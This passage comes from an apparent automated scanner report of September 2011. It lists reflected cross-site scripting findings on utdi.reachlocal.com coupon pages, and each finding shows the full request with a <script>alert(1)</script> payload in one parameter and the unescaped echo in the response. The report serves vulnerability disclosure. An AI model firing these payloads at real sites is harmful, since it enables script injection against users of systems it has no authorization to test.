Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3069
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:39 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=e78be"><script>alert(1)</script>08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%2
...[SNIP]...

2.54. http://utdi.reachlocal.com/coupon/ [dynamic_proxy parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cf04"><script>alert(1)</script>7fa24af02aa was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:04 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3079
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:56 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=7cf04"><script>alert(1)</script>7fa24af02aa&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
nam
...[SNIP]...

2.55. http://utdi.reachlocal.com/coupon/ [kw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdd5"><script>alert(1)</script>2b246827237 was submitted in the kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:00 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3069
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:52 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=2cdd5"><script>alert(1)</script>2b246827237&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
...[SNIP]...

2.56. http://utdi.reachlocal.com/coupon/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62459"><script>alert(1)</script>8a2698860bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:18 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3087
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:11 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&62459"><script>alert(1)</script>8a2698860bf=1&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.57. http://utdi.reachlocal.com/coupon/ [primary_serv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db859"><script>alert(1)</script>c1c2d326329 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:08 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3043
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:00 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=db859"><script>alert(1)</script>c1c2d326329&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargi
...[SNIP]...

2.58. http://utdi.reachlocal.com/coupon/ [pub_cr_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the pub_cr_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d06"><script>alert(1)</script>76c9d147fa9 was submitted in the pub_cr_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:16 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3061
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:09 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=98d06"><script>alert(1)</script>76c9d147fa9&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.59. http://utdi.reachlocal.com/coupon/ [rl_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d92f9"><script>alert(1)</script>de87c2b7e5 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:55 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3015
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:48 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=d92f9"><script>alert(1)</script>de87c2b7e5&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landin
...[SNIP]...

2.60. http://utdi.reachlocal.com/coupon/ [scid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6519"><script>alert(1)</script>c8b035ec73b was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:43 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3056
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:35 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=e6519"><script>alert(1)</script>c8b035ec73b&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26i
...[SNIP]...

2.61. http://utdi.reachlocal.com/coupon/ [se_refer parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the se_refer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61005"><script>alert(1)</script>ee0a10336fd was submitted in the se_refer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:53:12 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 2891
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:05 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=61005"><script>alert(1)</script>ee0a10336fd&pub_cr_id=8668759748&rl_track_landing_pages=1"
name="RL_main" topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
noresize frameborder="no" scrolling="NO">
...[SNIP]...

2.62. http://utdi.reachlocal.com/coupon/ [tc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3305c"><script>alert(1)</script>2dc212c00e9 was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:51 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 3047
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7b45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:44 GMT;path=/;httponly


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>

<title>UTDI (san francisco,CA)</title>

<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
...[SNIP]...
<frame src="/coupon/d837/837045/index5.html?scid=2323693&cid=837045&tc=3305c"><script>alert(1)</script>2dc212c00e9&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bserv
...[SNIP]...

2.63. http://utdi.reachlocal.com/coupon/d837/837045/index5.html [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /coupon/d837/837045/index5.html

Issue detail

The value of the cid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2e"><script>alert(1)</script>2688833dcab was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d837/837045/index5.html?scid=2323693&cid=8370453ca2e"><script>alert(1)</script>2688833dcab&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:52 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Length: 3263
Content-Type: text/html
